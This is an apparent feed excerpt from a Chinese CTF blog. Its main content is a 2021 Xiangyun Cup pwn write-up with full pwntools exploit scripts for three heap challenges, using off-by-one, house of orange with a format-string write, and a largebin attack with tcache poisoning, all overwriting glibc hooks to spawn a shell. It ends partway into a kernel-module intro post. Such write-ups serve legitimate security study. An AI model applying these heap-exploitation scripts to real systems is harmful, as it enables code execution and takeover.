<title>RCTF_2021_pwn复现</title>
<link href="https://brooke-hub.github.io/2021/09/22/RCTF-2021-pwn%E5%A4%8D%E7%8E%B0/"/>
<id>https://brooke-hub.github.io/2021/09/22/RCTF-2021-pwn%E5%A4%8D%E7%8E%B0/</id>
<published>2021-09-22T08:40:01.000Z</published>
<updated>2021-09-22T09:17:47.092Z</updated>
<category term="pwn" scheme="https://brooke-hub.github.io/tags/pwn/"/>
</entry>
<entry>
<title>2021祥云杯pwn_wp</title>
<link href="https://brooke-hub.github.io/2021/09/20/2021%E7%A5%A5%E4%BA%91%E6%9D%AFpwn-wp/"/>
<id>https://brooke-hub.github.io/2021/09/20/2021%E7%A5%A5%E4%BA%91%E6%9D%AFpwn-wp/</id>
<published>2021-09-20T00:58:21.000Z</published>
<updated>2021-09-20T13:23:00.992Z</updated>
<content type="html"><![CDATA[<blockquote><p>又是拖了好久的复现,祥pwn杯😅</p></blockquote><span id="more"></span><h1 id="PassWordBox-FreeVersion"><a href="#PassWordBox-FreeVersion" class="headerlink" title="PassWordBox_FreeVersion"></a><strong>PassWordBox_FreeVersion</strong></h1><p>off by one</p><p>就是数据会被异或加密,但是异或结果可以被泄露从而算出密钥</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line">binary = <span class="string">'./pwdFree'</span></span><br><span class="line">elf=ELF(binary)</span><br><span class="line">libc=ELF(<span class="string">"/home/wendy/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.4_amd64/libc.so.6"</span>)</span><br><span class="line">flag=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'119.3.81.43'</span>, <span class="number">49153</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process(binary)</span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">menu</span>(<span class="params">choice</span>):</span></span><br><span class="line"> sla(<span class="string">"Choice:"</span>,<span class="built_in">str</span>(choice))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">idx,size,pwd</span>):</span></span><br><span class="line"> menu(<span class="number">1</span>)</span><br><span class="line"> sla(<span class="string">'t Save:'</span>,<span class="built_in">str</span>(idx))</span><br><span class="line"> sla(<span class="string">'Length Of Your Pwd:'</span>,<span class="built_in">str</span>(size)) <span class="comment">#<=0x100</span></span><br><span class="line"> sla(<span class="string">'Your Pwd:'</span>,pwd)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,pwd</span>):</span></span><br><span class="line"> menu(<span class="number">2</span>)</span><br><span class="line"> sl(<span class="built_in">str</span>(index))</span><br><span class="line"> sd(pwd)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">idx</span>):</span></span><br><span class="line"> menu(<span class="number">3</span>)</span><br><span class="line"> sla(<span class="string">"Want Check:"</span>,<span class="built_in">str</span>(idx))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span>(<span class="params">idx</span>):</span></span><br><span class="line"> menu(<span class="number">4</span>)</span><br><span class="line"> sla(<span class="string">"2 Delete:"</span>,<span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">1</span>,<span class="string">'a'</span>)</span><br><span class="line">sh.recvuntil(<span class="string">'Save ID:'</span>)</span><br><span class="line">xor = (u64(sh.recv(<span class="number">8</span>)))^<span class="built_in">ord</span>(<span class="string">'a'</span>)</span><br><span class="line">leak(<span class="string">'xor'</span>,xor)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">1</span>,<span class="number">0xF0</span>,<span class="string">'a'</span>*<span class="number">0xF0</span>) <span class="comment">#1</span></span><br><span class="line">add(<span class="number">2</span>,<span class="number">0x80</span>,<span class="string">'b'</span>*<span class="number">0x80</span>) <span class="comment">#2</span></span><br><span class="line">add(<span class="number">3</span>,<span class="number">0x88</span>,<span class="string">'c'</span>*<span class="number">0x88</span>) <span class="comment">#3</span></span><br><span class="line">add(<span class="number">4</span>,<span class="number">0xF0</span>,<span class="string">'d'</span>*<span class="number">0xF0</span>) <span class="comment">#4</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>,<span class="number">12</span>): <span class="comment">#5-11</span></span><br><span class="line"> add(i,<span class="number">0xf0</span>,<span class="string">'e'</span>*<span class="number">0xd0</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>,<span class="number">12</span>): <span class="comment">#5-11</span></span><br><span class="line"> delete(i)</span><br><span class="line"></span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">delete(<span class="number">3</span>)</span><br><span class="line">add(<span class="number">3</span>,<span class="number">0x88</span>,<span class="string">'a'</span>*<span class="number">0x80</span>+p64((<span class="number">0x100</span>+<span class="number">0x90</span>+<span class="number">0x90</span>)^xor)+<span class="string">'\x00'</span>)</span><br><span class="line">delete(<span class="number">4</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>,<span class="number">12</span>): <span class="comment">#5-11</span></span><br><span class="line"> add(i,<span class="number">0xf0</span>,<span class="string">'e'</span>*<span class="number">0xd0</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">0xF0</span>,<span class="string">'a\n'</span>)</span><br><span class="line">show(<span class="number">2</span>)</span><br><span class="line">sh.recvuntil(<span class="string">'Pwd is: '</span>)</span><br><span class="line">libc_base = ((u64(sh.recv(<span class="number">8</span>)))^xor) - <span class="number">0x3ebca0</span></span><br><span class="line">leak(<span class="string">'libc_base'</span>,libc_base)</span><br><span class="line">__free_hook=libc_base+libc.sym[<span class="string">'__free_hook'</span>]</span><br><span class="line">system=libc_base+libc.sym[<span class="string">'system'</span>]</span><br><span class="line"></span><br><span class="line">add(<span class="number">12</span>,<span class="number">0x80</span>,<span class="string">'b\n'</span>) <span class="comment">#12==1</span></span><br><span class="line">add(<span class="number">13</span>,<span class="number">0x88</span>,<span class="string">'c'</span>*<span class="number">0x88</span>) </span><br><span class="line">add(<span class="number">14</span>,<span class="number">0xF0</span>,<span class="string">'d'</span>*<span class="number">0xF0</span>) </span><br><span class="line"></span><br><span class="line">delete(<span class="number">2</span>)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">edit(<span class="number">12</span>,p64(__free_hook))</span><br><span class="line">add(<span class="number">4</span>,<span class="number">0x80</span>,<span class="string">'s'</span>)</span><br><span class="line">add(<span class="number">15</span>,<span class="number">0x80</span>,p64((<span class="number">0x4f432</span>+libc_base)^xor)+<span class="string">'\x00'</span>) <span class="comment">#0x4f3d5 0x4f432 0x10a41c</span></span><br><span class="line">delete(<span class="number">4</span>)</span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line">ti()</span><br></pre></td></tr></table></figure><h1 id="note"><a href="#note" class="headerlink" title="note"></a>note</h1><p>scanf的格式化字符串漏洞可以无限任意地址写</p><p>没有dele功能,使用house of orange</p><p>有了堆地址,用任意写功能改小top chunk size(注意要对齐)</p><p>让top chunk被释放到unsortedbin,再申请出来泄露libc</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line"></span><br><span class="line">binary = <span class="string">'./note'</span></span><br><span class="line">elf=ELF(binary)</span><br><span class="line">libc = ELF(<span class="string">'/home/wendy/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6'</span>)</span><br><span class="line">flag=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'47.104.70.90'</span>, <span class="number">25315</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process(binary)</span><br><span class="line"></span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leaklibc</span>():</span></span><br><span class="line"> <span class="keyword">global</span> libc_base,__malloc_hook,__free_hook,system,binsh_addr,_IO_2_1_stdout_,_IO_list_all,realloc</span><br><span class="line"> libc_base = u64(sh.recvuntil(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">'\x00'</span>)) - <span class="number">0x3c4c48</span></span><br><span class="line"> success(<span class="string">'libc_base = '</span>+<span class="built_in">hex</span>(libc_base))</span><br><span class="line"> __malloc_hook=libc_base+libc.sym[<span class="string">'__malloc_hook'</span>]</span><br><span class="line"> __free_hook=libc_base+libc.sym[<span class="string">'__free_hook'</span>]</span><br><span class="line"> system=libc_base+libc.sym[<span class="string">'system'</span>]</span><br><span class="line"> realloc=libc_base+libc.sym[<span class="string">'realloc'</span>]</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line"> sla(<span class="string">'choice: '</span>, <span class="built_in">str</span>(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,content</span>):</span></span><br><span class="line"> cmd(<span class="number">1</span>)</span><br><span class="line"> sla(<span class="string">'size: '</span>,<span class="built_in">str</span>(size)) <span class="comment">#<=0x100</span></span><br><span class="line"> sa(<span class="string">'content: '</span>,content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">say</span>(<span class="params">fmt,content</span>):</span></span><br><span class="line"> cmd(<span class="number">2</span>)</span><br><span class="line"> sla(<span class="string">'say ? '</span>,fmt)</span><br><span class="line"> sla(<span class="string">'? '</span>,content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>():</span></span><br><span class="line"> cmd(<span class="number">3</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">0xf0</span>,<span class="string">'a\n'</span>)</span><br><span class="line">sh.recvuntil(<span class="string">'addr: 0x'</span>)</span><br><span class="line">chunk_addr = <span class="built_in">int</span>(sh.recvuntil(<span class="string">'\n'</span>,drop=<span class="literal">True</span>),<span class="number">16</span>) -<span class="number">0x10</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x10</span>-<span class="number">2</span>): <span class="comment"># align top chunk size</span></span><br><span class="line"> add(<span class="number">0xf0</span>,<span class="string">'a\n'</span>)</span><br><span class="line">leak(<span class="string">'chunk_addr'</span>,chunk_addr)</span><br><span class="line">top_chunk=chunk_addr+<span class="number">0xf00</span></span><br><span class="line">leak(<span class="string">'top_chunk'</span>,top_chunk)</span><br><span class="line">say(<span class="string">"%7$s"</span>.ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)+p64(top_chunk+<span class="number">8</span>),p64(<span class="number">0x101</span>)) <span class="comment"># top size 0x20101 -> 0x101</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x100</span>,<span class="string">'bbbb\n'</span>)</span><br><span class="line">add(<span class="number">0x10</span>,<span class="string">'a'</span>*<span class="number">8</span>)</span><br><span class="line">show()</span><br><span class="line">leaklibc()</span><br><span class="line"></span><br><span class="line">one=[<span class="number">0x45226</span>,<span class="number">0x4527a</span>,<span class="number">0xf03a4</span>,<span class="number">0xf1247</span>]</span><br><span class="line">say(<span class="string">"%7$s"</span>.ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)+p64(__malloc_hook-<span class="number">8</span>),p64(one[<span class="number">1</span>]+libc_base)+p64(realloc+<span class="number">13</span>)) </span><br><span class="line"></span><br><span class="line">leak(<span class="string">'realloc+13'</span>,realloc+<span class="number">13</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">cmd(<span class="number">1</span>)</span><br><span class="line">sla(<span class="string">'size: '</span>,<span class="built_in">str</span>(<span class="number">0x20</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line"></span><br><span class="line">ti()</span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="PassWordBox-ProVersion"><a href="#PassWordBox-ProVersion" class="headerlink" title="PassWordBox_ProVersion"></a><strong>PassWordBox_ProVersion</strong></h1><p>加密部分还是和第一题一样,xor加密数字固定,利用0^num=num可以泄露出num</p><p>可以UAF,但是因为chunk大小限制不能直接tcache劫持</p><p>可以通过largebin attack往mp_.tcache_bins写一个很大的数(堆地址),这样就可以把largechunk放入tcachebin了</p><p><img src="/2021/09/20/2021%E7%A5%A5%E4%BA%91%E6%9D%AFpwn-wp/image-20210920183216925.png" alt="image-20210920183216925"></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line"></span><br><span class="line">binary = <span class="string">'./pwdPro'</span></span><br><span class="line">elf=ELF(binary)</span><br><span class="line">libc = ELF(<span class="string">'/home/wendy/Desktop/glibc-all-in-one/libs/2.31-0ubuntu9.2_amd64/libc.so.6'</span>)</span><br><span class="line">flag=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'47.104.70.90'</span>, <span class="number">25315</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process(binary)</span><br><span class="line"></span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line"> sla(<span class="string">'Input Your Choice:\n'</span>, <span class="built_in">str</span>(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">index,ID,Length,content</span>):</span></span><br><span class="line"> cmd(<span class="number">1</span>)</span><br><span class="line"> sla(<span class="string">'Which PwdBox You Want Add:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> sla(<span class="string">'Input The ID You Want Save:'</span>,ID)</span><br><span class="line"> sla(<span class="string">'Length Of Your Pwd:'</span>,<span class="built_in">str</span>(Length)) <span class="comment">#0x41f-0x888</span></span><br><span class="line"> sa(<span class="string">'Your Pwd:'</span>,content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line"> cmd(<span class="number">2</span>)</span><br><span class="line"> sla(<span class="string">'You Want Edit:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> sl(content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">3</span>)</span><br><span class="line"> sla(<span class="string">'Which PwdBox You Want Check:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dele</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">4</span>)</span><br><span class="line"> sla(<span class="string">'Idx you want 2 Delete:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">recover</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">5</span>)</span><br><span class="line"> sla(<span class="string">'Idx you want 2 Recover:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="string">'a'</span>,<span class="number">0x628</span>,p64(<span class="number">0</span>)+<span class="string">'\n'</span>)</span><br><span class="line"></span><br><span class="line">sh.recvuntil(<span class="string">'Save ID:'</span>)</span><br><span class="line">secret_xor = u64(sh.recv(<span class="number">8</span>))</span><br><span class="line">leak(<span class="string">'secret_xor'</span>,secret_xor)</span><br><span class="line"></span><br><span class="line">add(<span class="number">1</span>,<span class="string">'b'</span>,<span class="number">0x420</span>,<span class="string">'b\n'</span>)</span><br><span class="line">add(<span class="number">2</span>,<span class="string">'b'</span>,<span class="number">0x618</span>,<span class="string">'b\n'</span>)</span><br><span class="line">add(<span class="number">3</span>,<span class="string">'b'</span>,<span class="number">0x420</span>,<span class="string">'b\n'</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">7</span>,<span class="string">'b'</span>,<span class="number">0x500</span>,<span class="string">'b\n'</span>)</span><br><span class="line">add(<span class="number">8</span>,<span class="string">'b'</span>,<span class="number">0x500</span>,<span class="string">'b\n'</span>)</span><br><span class="line"></span><br><span class="line">dele(<span class="number">0</span>) <span class="comment"># into unsortedbin</span></span><br><span class="line">recover(<span class="number">0</span>)</span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">sh.recvuntil(<span class="string">'Pwd is: '</span>)</span><br><span class="line">libc_base = (u64(sh.recv(<span class="number">8</span>)) ^ secret_xor) - <span class="number">0x1ebbe0</span></span><br><span class="line">leak(<span class="string">'libc_base'</span>,libc_base)</span><br><span class="line">__free_hook=libc_base+libc.sym[<span class="string">'__free_hook'</span>]</span><br><span class="line">system=libc_base+libc.sym[<span class="string">'system'</span>]</span><br><span class="line"></span><br><span class="line">add(<span class="number">4</span>,<span class="string">'a'</span>,<span class="number">0x638</span>,p64(<span class="number">0</span>)+<span class="string">'\n'</span>) <span class="comment">#0x630 chunk0 into largebin</span></span><br><span class="line">dele(<span class="number">2</span>) <span class="comment">#0x620 chunk2 into unsortedbin</span></span><br><span class="line">mp_bins = libc_base+<span class="number">0x1eb280</span>+<span class="number">0x50</span>-<span class="number">0x20</span></span><br><span class="line">leak(<span class="string">'mp_bins'</span>,mp_bins)</span><br><span class="line">edit(<span class="number">0</span>,p64(<span class="number">0</span>)+p64(<span class="number">0</span>)+p64(<span class="number">0</span>)+p64(mp_bins)) <span class="comment"># uaf edit largechunk0(0x630)</span></span><br><span class="line">add(<span class="number">5</span>,<span class="string">'a'</span>,<span class="number">0x638</span>,p64(<span class="number">0</span>)+<span class="string">'\n'</span>) <span class="comment"># chunk2 into largebin --> largbin attack!</span></span><br><span class="line"></span><br><span class="line">dele(<span class="number">7</span>)</span><br><span class="line">dele(<span class="number">8</span>)</span><br><span class="line">recover(<span class="number">8</span>)</span><br><span class="line">edit(<span class="number">8</span>,p64(__free_hook)+<span class="string">'\n'</span>)</span><br><span class="line">add(<span class="number">9</span>,<span class="string">'b'</span>,<span class="number">0x500</span>,<span class="string">'c\n'</span>)</span><br><span class="line">edit(<span class="number">9</span>,<span class="string">'/bin/sh\x00\n'</span>)</span><br><span class="line">add(<span class="number">10</span>,<span class="string">'b'</span>,<span class="number">0x500</span>,p64(system^secret_xor)+<span class="string">'\n'</span>)</span><br><span class="line"></span><br><span class="line">dele(<span class="number">9</span>)</span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line"></span><br><span class="line">ti()</span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="lemon"><a href="#lemon" class="headerlink" title="lemon"></a>lemon</h1><p>这一块说是考察rand()不安全随机数接口</p><p>没给定种子的rand(),生成的随机数是固定的,但还是没太明白这解题方法哪里用到了固定随机数😗</p><p>只要buf输入一个很大的数,就可以循环rand多次,只要有一次符合条件就可以返回1</p><p><img src="/2021/09/20/2021%E7%A5%A5%E4%BA%91%E6%9D%AFpwn-wp/image-20210920134010284.png" alt="image-20210920134010284"></p>]]></content>
<summary type="html"><blockquote>
<p>又是拖了好久的复现,祥pwn杯😅</p>
</blockquote></summary>
<category term="pwn" scheme="https://brooke-hub.github.io/tags/pwn/"/>
</entry>
<entry>
<title>kernel_pwn初探</title>
<link href="https://brooke-hub.github.io/2021/09/09/kernel-pwn%E5%88%9D%E6%8E%A2/"/>
<id>https://brooke-hub.github.io/2021/09/09/kernel-pwn%E5%88%9D%E6%8E%A2/</id>
<published>2021-09-09T10:49:49.000Z</published>
<updated>2021-09-13T09:13:34.901Z</updated>
<content type="html"><![CDATA[<blockquote><p>之前实在看不懂Wiki上的入门讲解,现在跟着轩哥博客试着入门kernel</p></blockquote><span id="more"></span><h2 id="正向开发"><a href="#正向开发" class="headerlink" title="正向开发"></a>正向开发</h2><p>从<a href="https://blog.csdn.net/qb_2008/article/details/6835677">hello world</a> 开始</p><p>这里编译生成module.ko时会遇到一个报错</p><p><img src="/2021/09/09/kernel-pwn%E5%88%9D%E6%8E%A2/image-20210909185354811.png" alt="image-20210909185354811"></p><p>这是因为函数原型和调用这个函数时产生了冲突,如参数类型不一样等</p><p>所以加上参数类型void就可以了 </p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/init.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/module.h></span></span></span><br><span class="line"> </span><br><span class="line">MODULE_LICENSE(<span class="string">"Dual BSD/GPL"</span>);</span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">int</span> <span class="title">hello_init</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> printk(KERN_INFO <span class="string">"Hello, world!\n"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">void</span> <span class="title">hello_exit</span><span 